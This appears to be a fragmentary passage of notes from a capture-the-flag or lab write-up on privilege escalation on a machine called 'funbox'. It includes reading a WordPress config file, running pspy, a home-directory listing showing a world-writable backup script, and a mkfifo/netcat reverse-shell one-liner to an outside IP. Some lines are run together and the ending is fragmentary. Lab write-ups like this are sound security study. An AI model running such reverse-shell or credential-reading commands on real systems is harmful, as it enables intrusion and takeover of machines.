Priv Esc
tar -xf html.tarcat var/www/html/wp-config.php
Upload pspy
./pspy64
www-data@funbox:/home/funny$ ls -la
ls -la
total 47592
drwxr-xr-x 3 funny funny 4096 Aug 21 2020 .
drwxr-xr-x 4 root root 4096 Jun 19 2020 ..
-rwxrwxrwx 1 funny funny 55 Aug 21 2020 .backup.sh
lrwxrwxrwx 1 funny funny 9 Aug 21 2020 .bash_history -> /dev/null
-rw-r--r-- 1 funny funny 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 funny funny 3771 Feb 25 2020 .bashrc
drwx------ 2 funny funny 4096 Jun 19 2020 .cache
-rw-r--r-- 1 funny funny 807 Feb 25 2020 .profile
-rw-rw-r-- 1 funny funny 162 Jun 19 2020 .reminder.sh
-rw-rw-r-- 1 funny funny 48701440 Aug 8 01:26 html.tarrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.214 1338 >/tmp/f
Run linpeas again
Weird route
Last updated